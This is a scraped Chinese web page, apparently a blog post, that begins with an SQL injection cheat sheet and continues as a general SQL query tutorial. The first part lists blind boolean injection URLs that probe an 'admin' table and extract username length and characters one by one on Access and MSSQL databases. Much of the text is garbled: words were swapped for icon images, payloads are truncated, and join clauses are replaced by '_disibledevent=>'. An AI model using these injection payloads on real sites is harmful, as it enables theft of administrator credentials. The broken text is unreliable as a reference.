![](/icons/60313dou.gif)
检测可否注入
http://127.0.0.1/xx?id=11 and 1=1 (正常页面)
http://127.0.0.1/xx?id=11 and 1=2 (出错页面)
检测表段
![](/icons/60313de.gif)
http://127.0.0.1/xx?id=11 and exists (select * from admin)
检测字段
![](/icons/60313de.gif)
http://127.0.0.1/xx?id=11 and exists (select username from admin)
检测ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)
检测长度
![](/icons/60313de.gif)
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
检测长度
![](/icons/60313de.gif)
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
检测是否为MSSQL数据库
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)
检测是否为英文
(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(sub
![](/icons/60313string.gif)
检测英文
![](/icons/60313de.gif)
(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(sub
![](/icons/60313string.gif)
检测那个
![](/icons/60313zifu.gif)
(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(sub
![](/icons/60313string.gif)
常用
![](/icons/60313hanshu.gif)
Access:asc(
![](/icons/60313zifu.gif)
![](/icons/60313zifu.gif)
作用:返回某
![](/icons/60313zifu.gif)
![](/icons/60313de.gif)
Access:chr(数字) SQLServer:nchar(数字)
作用:和asc相反
![](/icons/60313dou.gif)
![](/icons/60313zifu.gif)
Access:mid(
![](/icons/60313zifu.gif)
![](/icons/60313string.gif)
![](/icons/60313zifu.gif)
作用:返回
![](/icons/60313zifu.gif)
![](/icons/60313zifu.gif)
![](/icons/60313de.gif)
![](/icons/60313zifu.gif)
![](/icons/60313dou.gif)
![](/icons/60313de.gif)
![](/icons/60313zifu.gif)
Access:abc(数字) SQLServer:abc (数字)
作用:返回数字
![](/icons/60313de.gif)
![](/icons/60313de.gif)
Access:A between B And C SQLServer:A between B And C
作用:判断A是否界于B和C的间
and exists(Select top 1 * From 用户 order by id)
1.在查询结果中显示列名:
a.用as关键字:select name as '姓名' from students order by age
b.直接表示:select name '姓名' from students order by age
2.精确查找:
a.用in限定范围:select * from students where native in ('湖南', ' 4川')
b.between...and:select * from students where age between 20 and 30
c.“=”:select * from students where name = '李山'
d.like:select * from students where name like '李%' (注意查询条件中有“%”
![](/icons/60313dou.gif)
![](/icons/60313dou.gif)
![](/icons/60313dou.gif)
![](/icons/60313de.gif)
![](/icons/60313dou2.gif)
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
![](/icons/60313dou.gif)
![](/icons/60313dou2.gif)
e.
![](/icons/60313zhk2.gif)
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
![](/icons/60313dou.gif)
![](/icons/60313zhk2.gif)
![](/icons/60313dou.gif)
3.对于时间类型变量
![](/icons/60313de.gif)
a.smalldatetime:直接按照
![](/icons/60313zifu.gif)
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
4.集
![](/icons/60313hanshu.gif)
a.count
![](/icons/60313kh.gif)
![](/icons/60313dou.gif)
b.avg(列)求平均
![](/icons/60313dou.gif)
c.max(列)和min(列)
![](/icons/60313dou.gif)
5.分组group
常用于统计时
![](/icons/60313dou.gif)
注意:从哪种角度分组就从哪列"group by"
对于多重分组
![](/icons/60313dou.gif)
![](/icons/60313dou2.gif)
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
性别(gender)
![](/icons/60313dou.gif)
select grade, mno, gender, count(*) from students group by grade, mno, gender
通常group还和having联用
![](/icons/60313dou.gif)
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
select sno,count(*) from grades where mark<60 group by sno having count(*)>1
6.UNION联合
合并查询结果
![](/icons/60313dou.gif)
SELECT * FROM students WHERE name like ‘张%’UNION [ALL] SELECT * FROM students WHERE name like ‘李%’
7.多表查询
a.内连接
select g.sno,s.name,c.coursename from grades g JOIN students s _disibledevent=>(注意可以引用别名)
b.外连接
b1.左连接
select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades _disibledevent=>左连接特点:显示全部左边表中
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
![](/icons/60313de.gif)
![](/icons/60313dou2.gif)
左外连接返回那些存在于左表而右表中却没有
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
![](/icons/60313de.gif)
![](/icons/60313dou2.gif)
b2.右连接
和左连接类似
b3.全连接
select sno,name,major from students FULL JOIN majors _disibledevent=>两边表中
![](/icons/60313de.gif)
c.自身连接
select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno
采用别名解决问题
![](/icons/60313dou2.gif)
d.交*连接
select lastname+firstname from lastname CROSS JOIN firstanme
相当于做笛卡儿积
8.嵌套查询
a.用关键字IN,如查询猪猪山
![](/icons/60313de.gif)
select * from students where native in (select native from students where name=’猪猪’)
b.使用关键字EXIST,比如
![](/icons/60313dou.gif)
![](/icons/60313de.gif)
select * from students where sno in (select sno from grades where cno=’B2’)
select * from students where exists (select * from grades where grades.sno=students.sno AND cno=’B2’)
9.有关排序order
a.对于排序order
![](/icons/60313dou.gif)
b.对于排序order,可以按照查询条件中
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
![](/icons/60313dou.gif)
select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3
10.其他
a.对于有空格
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
![](/icons/60313zhk2.gif)
![](/icons/60313dou2.gif)
b.对于某列中没有数据
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
c.注意区分在嵌套查询中使用
![](/icons/60313de.gif)
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
d.注意在做否定意义
![](/icons/60313de.gif)
如
![](/icons/60313dou.gif)
![](/icons/60313de.gif)
select students.* from students, grades where students.sno=grades.sno AND grades.cno <> ’B2’
上面
![](/icons/60313de.gif)
![](/icons/60313cuowu.gif)
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
select * from students where not exists (select * from grades where grades.sno=students.sno AND cno='B2')
11.有关有难度多重嵌套查询
![](/icons/60313de.gif)
![](/icons/60313dou.gif)
最外
![](/icons/60313yi.gif)
![](/icons/60313dou.gif)
![](/icons/60313de.gif)
![](/icons/60313dou2.gif)
![](/icons/60313dou2.gif)
![](/icons/60313dou.gif)
![](/icons/60313dou.gif)
![](/icons/60313de.gif)
![](/icons/60313yi.gif)
![](/icons/60313yi.gif)
最新评论